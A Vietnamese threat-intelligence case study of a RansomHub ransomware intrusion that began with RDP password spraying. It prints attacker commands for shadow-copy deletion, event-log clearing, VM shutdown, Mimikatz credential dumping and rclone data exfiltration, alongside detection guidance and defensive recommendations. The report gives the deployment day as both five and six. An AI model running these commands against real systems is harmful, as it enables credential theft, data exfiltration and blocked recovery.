Hôm nay chúng ta cùng đi phân tích một case study về một vụ tấn công mạng đặc biệt nghiêm trọng, được thực hiện thông qua kỹ thuật password spray và dẫn đến sự triển khai của mã độc RansomHub.

Vụ tấn công này, bắt đầu vào tháng 11 năm 2024, đã khiến một hệ thống mạng lớn bị xâm nhập và chịu ảnh hưởng nghiêm trọng. Các bước tấn công tinh vi của kẻ tấn công, từ việc thu thập thông tin đăng nhập đến việc triển khai ransomware, đều thể hiện một sự chuẩn bị kỹ lưỡng và sử dụng các công cụ tấn công chuyên nghiệp. Trong bài viết này, chúng ta sẽ phân tích chi tiết từng bước của vụ tấn công, các công cụ, chiến thuật và quy trình mà kẻ tấn công sử dụng trong chiến dịch này, để có thể rút ra những bài học nhằm bảo vệ hệ thống mạng của mình tốt hơn.

Tóm Tắt Kịch Bản Vụ Tấn Công

Cuộc tấn công bắt đầu vào tháng 11 năm 2024 qua một cuộc tấn công password spray vào một máy chủ RDP mở. Kẻ tấn công sử dụng các IP độc hại để thử đăng nhập vào nhiều tài khoản, sau đó đăng nhập thành công và thực hiện các lệnh khám phá qua RDP, sử dụng Mimikatz và Nirsoft để thu thập thông tin đăng nhập và tương tác với bộ nhớ LSASS.

Kẻ tấn công tiếp tục di chuyển qua các máy chủ domain controller và các máy chủ khác trong hệ thống, sử dụng Mimikatz để thu thập thêm thông tin đăng nhập. Sau khi cài đặt Atera và Splashtop, chúng duy trì quyền truy cập và thực hiện quét mạng rộng hơn bằng Advanced IP Scanner và NetScan. Vào ngày thứ ba, Rclone được sử dụng để lấy dữ liệu qua SFTP.

Vào ngày thứ năm, kẻ tấn công triển khai ransomware RansomHub qua SMB. Chúng mã hóa các tệp và yêu cầu tiền chuộc. Thời gian triển khai ransomware (TTR) là khoảng 118 giờ.

Phân Tích Kỹ Thuật

Initial Access

Cuộc tấn công này bắt đầu vào cuối tháng 11 năm 2024, khi kẻ tấn công thực hiện một loạt các nỗ lực password spray nhắm vào nhiều tài khoản người dùng qua một máy chủ RDP công khai. Hoạt động này kéo dài khoảng bốn giờ và xuất phát từ hai địa chỉ IP thuộc cùng một nhà cung cấp dịch vụ Internet (ISP): 185.190.24.54 và 185.190.24.33.

Thông tin từ nguồn mở (OSINT) cho thấy các địa chỉ IP này có lịch sử liên quan đến các hoạt động độc hại. Theo báo cáo từ AbuseIPDB, các IP này đã được liên kết với nhiều lần thử đăng nhập thất bại nhắm vào tường lửa và giao diện quản trị web, cho thấy chúng được sử dụng trong các cuộc tấn công quét mạng và thu thập thông tin đăng nhập.

Kẻ tấn công đã thành công trong việc xác thực vào sáu tài khoản người dùng khác nhau, như được ghi nhận qua các sự kiện Windows Security Log Event ID 4624, chỉ ra các lần đăng nhập thành công.

Sau đó, kẻ tấn công chọn một tài khoản và thực hiện đăng nhập, khoảng bốn giờ sau khi các lần đăng nhập thành công từ hoạt động password spray. Tài khoản này sẽ được gọi là Tài Khoản Truy Cập Ban Đầu (Initial Access User) từ đây trở đi trong báo cáo này. Lưu ý rằng kẻ tấn công đã sử dụng một địa chỉ IP khác, 164.138.90.2, với thông tin ISP và vị trí địa lý khác.

Khi kiểm tra kỹ hơn, các chuyên gia nhận thấy rằng Tài Khoản Truy Cập Ban Đầu đã đăng nhập với Elevated Token (Elevated Token: Yes), nghĩa là phiên làm việc này đã được nâng quyền và có quyền quản trị viên – theo Event 4624 Microsoft Learn.

Ngoài ra, các chuyên gia cũng quan sát thấy một số địa chỉ IP khác đã truy cập vào Tài Khoản Truy Cập Ban Đầu và một tài khoản khác trong những ngày sau khi vụ tấn công ban đầu xảy ra. Tuy nhiên, không có bằng chứng cho thấy những truy cập này liên quan đến kẻ tấn công trong vụ việc này.

Execution

Trong suốt cuộc tấn công, các chuyên gia quan sát thấy việc thực thi nhiều script và câu lệnh do kẻ tấn công điều khiển.

Visual Basic

nocmd.vbs được thực thi như một phần trong quá trình lấy dữ liệu ra ngoài bằng RClone. Script Visual Basic này tạo ra một tiến trình WScript để chạy script batch RClone, rcl.bat. Thông tin chi tiết về script này sẽ được thảo luận trong phần Exfiltration.

Batch Script

rcl.bat là một script batch được sử dụng để thực thi công việc RClone. Nó nhận các hướng dẫn về các tệp cần lấy dữ liệu từ một tệp có tên include.txt. Thông tin chi tiết về script này sẽ được thảo luận trong phần Exfiltration.

PowerShell

Ransomware Ransomhub sử dụng nhiều lệnh PowerShell. Thông tin chi tiết về điều này sẽ được thảo luận trong phần Impact, còn dưới đây sẽ là một vài ví dụ về câu lệnh PowerShell:

1. Để buộc dừng VM trong các máy chủ Hypervisor

powershell.exe -Command PowerShell -Command "{ Get-VM | where { $.Name -ne 'VM01' -and $.Name -ne 'VM02' } | Stop-VM -Force"

2. Để xóa volume shadow copy

powershell.exe -Command PowerShell -Command ""Get-CimInstance Win32_ShadowCopy | Remove-CimInstance""

Windows Command Shell

Kẻ tấn công cũng thực thi các lệnh rò quét hệ thống thông thường như nslookup, net và nhiều lệnh khác. Thông tin chi tiết về mục này sẽ được thảo luận trong phần Discovery.

RDP Session Executions

Kẻ tấn công đã lợi dụng phiên RDP để tương tác trực tiếp với môi trường desktop, được chứng minh thông qua việc quan sát tiến trình cha explorer.exe khởi chạy các công cụ và binary như Mimikatz, CredentialsFileView, Advanced IP Scanner và NetScan.

Persistence

Trong suốt cuộc tấn công, kẻ tấn công đã triển khai các công cụ Atera và Splashtop RMM trên nhiều máy chủ. Những công cụ này cho phép duy trì sự tồn tại bằng cách thiết lập các dịch vụ trên các máy chủ, điều này có thể được quan sát trong event ID 7045.

Vào một giai đoạn sau của cuộc tấn công, kẻ tấn công đã thay đổi mật khẩu của nhiều người dùng bằng cách sử dụng lệnh net, và tất cả đều có mật khẩu giống nhau. Ngoài việc duy trì sự tồn tại, thời điểm thay đổi mật khẩu xung quanh việc triển khai ransomware cho thấy kẻ tấn công có thể đã thực hiện hành động này để hỗ trợ ransomware lây lan hoặc ngăn chặn quyền truy cập của quản trị viên trong suốt cuộc tấn công.

Defense Evasion

Trong cuộc tấn công, kẻ tấn công không xóa tất cả các tệp họ đã tải xuống. Ngoài ra, chúng còn quay lại các máy chủ tệp sau 20 giờ hoạt động để lấy dữ liệu ra ngoài và xóa các tệp liên quan đến Rclone.

Cùng với việc thực thi ransomware, các chuyên gia quan sát thấy các lệnh sau được sử dụng để xóa bằng chứng từ máy chủ và ngăn cản các hoạt động khôi phục hệ thống.

1. Chạy vssadmin.exe và xóa các tệp shadow copy:

cmd.exe /c ""vssadmin.exe Delete Shadows /all /quiet""

2. Để chạy fsutil và cho phép symbolic links R2L và R2R:

cmd.exe /c ""fsutil behavior set SymlinkEvaluation R2L:1""
cmd.exe /c ""fsutil behavior set SymlinkEvaluation R2R:1""

3. Để chạy wevutil và xóa các log Windows:

cmd.exe /c wevtutil cl security
cmd.exe /c wevtutil cl system
cmd.exe /c wevtutil cl application

Credential Access

Như thường thấy trong hầu hết các vụ tấn công, để có quyền truy cập vào máy chủ RDP thông qua kỹ thuật password spraying, kẻ tấn công sẽ phải sử dụng các công cụ thu thập thông tin đăng nhập, phổ biến nhất là Mimikatz và Nirsoft’s CredentialsFileView. Những công cụ này được triển khai trên các máy chủ đã bị xâm nhập để thu thập thêm thông tin đăng nhập đã lưu trên hệ thống.

Các nhà nghiên cứu đã quan sát thấy cả hai công cụ này được thả xuống trên màn hình Desktop của người dùng bị xâm nhập. Đầu tiên, CredentialsFileView được sử dụng để giải mã các tệp thông tin đăng nhập lưu trên hệ thống Windows, hiển thị mật khẩu đã lưu dưới dạng plaintext. Hoạt động này có thể được phát hiện qua Event ID 5379, chỉ ra các hoạt động liệt kê và đọc thông tin đăng nhập đã lưu.

Sau đó, Mimikatz được sử dụng để thu thập các thông tin nhạy cảm khác. Việc thực thi công cụ này dẫn đến việc tạo ra nhiều tệp kết quả tuỳ theo số domain con.

Số lượng log không chỉ ra việc đồng bộ toàn bộ tài khoản AD, nhưng có khả năng kẻ tấn công đang kiểm tra xem tài khoản có quyền hạn của họ có tồn tại trên tất cả các miền và có cùng một mật khẩu hay không. Lệnh sử dụng có thể giống như sau:

lsadump::dcsync /domain:CHILD.DOMAIN.EXAMPLE /user:DOMAINADMINUSER /csv > CHILD.csv

Phân tích thêm các nhật ký Sysmon cho thấy Mimikatz cũng có thể đã được thực thi với các lệnh nhắm vào quá trình Local Security Authority Subsystem Service (LSASS), chẳng hạn như khi lệnh sekurlsa::logonpasswords được sử dụng, lệnh này được thiết kế để trích xuất thông tin đăng nhập và ticket trực tiếp từ bộ nhớ LSASS. Nếu không có dòng lệnh đầy đủ, một cách khác để bắt được Mimikatz nhắm vào LSASS là tìm kiếm các tiến trình truy cập LSASS (Sysmon Event 10).

Discovery

Kẻ tấn công đã sử dụng sự kết hợp giữa các kỹ thuật living-off-the-land và công cụ bên thứ ba để thực hiện các hoạt động discovery. Họ đã sử dụng các lệnh tích hợp sẵn của Windows như net và nltest, các công cụ bên thứ ba như Advanced IP Scanner và SoftPerfect NetScan, và các applet của Microsoft Management Console.

Các Lệnh Living-off-the-land

Kẻ tấn công đã sử dụng các lệnh này để thực hiện việc rò quét hệ thống mạng của nạn nhân:

• Nslookup – Phân giải tên miền nội bộ để xác định các domain controller hoặc thông tin DNS.

• Net – Liệt kê các nhóm người dùng, tài khoản domain, máy tính, và các cài đặt chính sách mật khẩu để xác định quyền hạn của người dùng.

• Nltest – Khám phá quan hệ tin cậy giữa các domain để tìm các lối đi cho việc lây lan hoặc truy cập giữa các domain.

• Ipconfig – Lấy cấu hình chi tiết của giao diện mạng để tìm hiểu về cài đặt IP, DNS và gateway của localhost.

• Route – Hiển thị bảng định tuyến để phân tích các mạng có thể tiếp cận và lên kế hoạch cho việc di chuyển hoặc lấy dữ liệu ra ngoài.

• Ping – Kiểm tra kết nối và phân giải các tên máy chủ nội bộ để xác định tình trạng của các hệ thống trong mạng.

Mỗi khi kẻ tấn công đăng nhập thành công vào một endpoint mới, họ đã thực hiện lại các lệnh trên.

Advanced IP Scanner

Kẻ tấn công đã tải xuống Advanced IP Scanner từ trang web chính thức. Sau đó, tệp cài đặt đã được lưu trong thư mục Download. Kẻ tấn công đã thực thi Advanced IP Scanner ba lần, sau đó xóa tệp sau khi đã sử dụng.

SoftPerfect NetScan

Kẻ tấn công đã thả netscan.exe vào thư mục Desktop của Tài Khoản Truy Cập Ban Đầu. Sau khi có quyền truy cập vào tài khoản Domain Admin, họ cũng đã thả tệp nhị phân này vào các thư mục desktop trên nhiều máy chủ và máy trạm, đặc biệt là trên máy chủ sao lưu, máy chủ chia sẻ file, máy chủ hypervisor và máy trạm.

Từ một trong các máy trạm thực thi công cụ NetScan, các nhà nghiên cứu thấy có 16 cổng khác nhau đã được quét. Dữ liệu này được ghi lại trong Sysmon Event ID 3. Các cổng quét nhiều nhất là 135 (RPC), 445 (SMB), 3389 (RDP) và 137 (NetBIOS).

Từ cùng một máy trạm, theo Sysmon Event ID 22, công cụ này cũng đã thực hiện các yêu cầu DNS đối với các máy chủ trong mạng.

Trong quá trình này, một dấu vết của NetScan đã được quan sát thấy, với sự kiện tạo tệp delete[.]me trên các máy chủ từ xa. Dấu vết này được tạo khi công cụ NetScan được sử dụng để xác định quyền ghi vào các chia sẻ tệp trong mạng – SoftPerfect Forum. Có thể thấy điều này qua Sysmon Event ID 11 – File Creation trên máy chủ đích hoặc Sysmon Event ID 1 – Process Creation qua rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie trên máy chủ nguồn.

File Browsing

Kẻ tấn công cũng bị phát hiện khi kiểm tra các tài liệu trên các máy chủ chia sẻ tệp và các chia sẻ mạng. Họ đã kiểm tra các tệp PDF và tài liệu, sử dụng các trình xem như Google Chrome và Microsoft Edge cho các tệp PDF và Windows WordPad cho các tệp doc.

Microsoft Management Console (MMC)

Các applet của Microsoft Management Console (MMC) là các công cụ quản trị mô-đun cung cấp giao diện đồ họa để quản lý các thành phần và dịch vụ hệ thống Windows. Mỗi applet, như dsa.msc hoặc dssite.msc, tập trung vào một khu vực quản lý hệ thống hoặc thư mục cụ thể trong một môi trường giao diện đồng nhất. Khi kẻ tấn công đã xâm nhập vào tài khoản quản trị viên miền, họ đã thực thi một số applet MMC trên nhiều máy chủ Domain Controller (DC).

Kẻ tấn công đã sử dụng các applet này để thực hiện việc khám phá mạng của nạn nhân:

• dnsmgmt.msc – Duyệt và thao tác cấu hình máy chủ DNS

• domain.msc – Xem và quản lý cấu hình miền, rừng hoặc các mối quan hệ tin cậy

• dssite.msc – Xem và quản lý các bản sao, cấu hình site và các mối quan hệ con trong Active Directory

• dsa.msc – Quản lý người dùng, nhóm, máy tính và các đơn vị tổ chức (OUs) trong một miền Active Directory

Lateral Movement

RDP

Quá trình di chuyển ngang ban đầu trong mạng của nạn nhân được thực hiện thông qua việc sử dụng Remote Desktop Protocol (RDP). Phân tích các nhật ký sự kiện bảo mật từ nhiều máy chủ bị xâm nhập cho thấy các nỗ lực đăng nhập thành công qua RDP xuất phát từ các hệ thống nội bộ. Các nỗ lực này có thể được quan sát qua Security Event ID 4624, với LogonType 10, như được hiển thị dưới đây:

SMB

Vào ngày thứ sáu của cuộc tấn công, kẻ tấn công bắt đầu chuẩn bị cho việc triển khai tự động payload ransomware trên toàn mạng.

Sau khi thực thi ransomware ban đầu trên một hệ thống, tiến trình được tạo ra bắt đầu thiết lập các kết nối với các hệ thống nội bộ khác. Các giao tiếp mạng này liên quan đến việc lây nhiễm ransomware đến các máy chủ từ xa qua giao thức Server Message Block (SMB). Phân tích mạng đã phát hiện các hoạt động SMB với các tên tệp ngẫu nhiên, tất cả đều có kích thước giống nhau, như quan sát được dưới đây từ Zeek.

Xác nhận sự hiện diện của ransomware trên các hệ thống mục tiêu cũng có thể được thực hiện bằng cách kiểm tra các sự kiện tạo tệp, ví dụ như kiểm tra $MFT hoặc Sysmon Event ID 11. Tại đây, các sự kiện tạo tệp ghi nhận sự xuất hiện của tệp thực thi ransomware với tên tệp ngẫu nhiên (ví dụ C:[random_string.exe].exe), như đã quan sát từ Zeek.

Command and Control

Atera và Splashtop

Trong suốt cuộc tấn công, kẻ tấn công bị phát hiện đã triển khai Atera cùng với Splashtop, một công cụ RMM hợp pháp. Hoạt động này cho phép chúng hòa vào các hoạt động mạng bình thường, sử dụng các tính năng tích hợp của Atera để truy cập từ xa. Splashtop để lại nhật ký trong tệp agent_log.txt nằm trong thư mục C:/Program Files (x86)/Splashtop/Splashtop Remote/Server/log/.

Xác định Hostname và tên của kẻ tấn công qua SPLog.txt
Ngoài việc nhận diện việc sử dụng Splashtop qua agent_log.txt, thêm bằng chứng đã được thu thập từ tệp SPLog.txt, nơi ghi lại các chi tiết thông tin của client khi một phiên làm việc từ xa được khởi tạo.

Truy Cập RDP Trực Tiếp

Ngay từ phase initial access, kẻ tấn công đã sử dụng RDP để duy trì quyền truy cập vào hệ thống của nạn nhân. Họ đã sử dụng RDP để thiết lập các phiên tương tác, trong đó họ có thể thực thi lệnh, di chuyển trong mạng và tiếp tục các hành động độc hại.

Exfiltration

Trong quá trình xâm nhập này, Rclone đã được sử dụng trên nhiều máy chủ tệp để tạo điều kiện cho việc trích xuất dữ liệu qua SFTP. Sau đó, Rclone đã bị loại bỏ cùng với nhiều tệp trợ giúp hỗ trợ thực thi của nó.

Tệp nocmd.vbs chứa một tập lệnh VBS nhằm thực thi tập lệnh rcl.bat.

Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "C:\ProgramData\Veeam\rcl.bat" & Chr(34), 0
Set WshShell = Nothing

rcl.bat là tệp Batch chứa lệnh chính để thực thi tệp thực thi rclone.

rclone copy [REDACTED]:/mnt/sdd/REDACTED --include-from include.txt

Bên trong includes.txt có một tập hợp các file extensions được đánh dấu để trích xuất dữ liệu.

.doc .docx .pdf .htm .html .xls .xlsx .jpg .jpeg .png .pst .msg .edb .mbox

Impact

Vào ngày thứ sáu của chiến dịch, kẻ tấn công bắt đầu triển khai ransomware trên mạng bằng tệp nhị phân ransomware có tên amd64.exe.

Trong Sysmon log, tiến trình độc hại được hiển thị dưới phiên của Explore.exe tạo ra từ kết nối Splashtop.

Tệp thực thi ransomware được gọi trực tiếp thông qua cmd.exe từ phiên RDP.

amd64.exe -pass [REDACTED]

Khi ransomware bắt đầu thực thi, nó sẽ chạy một tập lệnh để dừng mọi máy ảo Hyper-V đang chạy trên hệ thống, xóa Shadow Copies và một vài Windows event. Ngoài ra, nó tận dụng khả năng di chuyển ngang tích hợp sẵn để truyền đến các máy chủ khác trong mạng thông qua SMB, cờ -only-local được sử dụng để ngăn chặn vòng lặp truyền. Đối với các máy chủ từ xa, ransomware được thực thi thông qua một dịch vụ từ xa, với tên 6 chữ cái ngẫu nhiên làm tên hình ảnh và tên dịch vụ.

Sau khi thực hiện thành công, ransomware sẽ mã hóa các tệp trong danh sách file extension đã đánh dấu từ trước và hiển thị thông báo tống tiền tới nạn nhân:

Toàn Bộ Timeline Của Chiến Dịch RansomHub

Danh Sách IOCs Liên Quan Đến Chiến Dịch RansomHub

Atomic

Computed

Khuyến nghị

Phía FPT Threat Intelligence khuyến nghị tổ chức và cá nhân một số cách để phòng chống chiến dịch tấn công nguy hiểm này:

• Tăng cường kiểm soát email và tệp tải về: Áp dụng chính sách lọc email nghiêm ngặt để ngăn chặn tệp đính kèm độc hại, các tập tin thực thi ẩn danh, hoặc nội dung giả mạo thường được sử dụng trong các chiến dịch phishing và lừa đảo tải phần mềm.

• Giám sát hành vi thực thi trong hệ thống: Theo dõi các tiến trình đáng ngờ, đặc biệt là các công cụ như PowerShell, MSBuild, rundll32 hoặc các hành vi bất thường như thực thi mã trong bộ nhớ, giả mạo tiến trình hợp pháp (process hollowing), hoặc tạo kết nối đến máy chủ lạ.

• Bảo vệ dữ liệu nhạy cảm và trình duyệt: Hạn chế lưu trữ thông tin đăng nhập trên trình duyệt; giám sát các hành vi truy cập hoặc trích xuất trái phép dữ liệu trình duyệt, bao gồm cả việc tiêm mã độc vào các trình duyệt phổ biến.

• Bảo vệ tài sản số như ví tiền điện tử: Không nên lưu seed phrase, private key hay tệp ví trên hệ thống dưới dạng văn bản thuần. Ưu tiên sử dụng ví phần cứng và kiểm tra định kỳ các tiện ích mở rộng trình duyệt liên quan đến ví.

• Tăng cường đào tạo nhận thức an ninh cho người dùng: Trang bị kiến thức để người dùng nhận biết email lừa đảo, phần mềm giả mạo, và thói quen bảo mật cơ bản như sử dụng nguồn tải phần mềm chính thống, không lưu thông tin nhạy cảm trên trình duyệt.

• Thiết lập cơ chế giám sát mạng chủ động: Giám sát lưu lượng mạng để phát hiện các chỉ số tấn công (IOCs) đã biết, lưu lượng bất thường, hoặc hành vi giao tiếp Command & Control (C2) từ các thiết bị đầu cuối.

Tham khảo

• Hide Your RDP: Password Spray Leads to RansomHub Deployment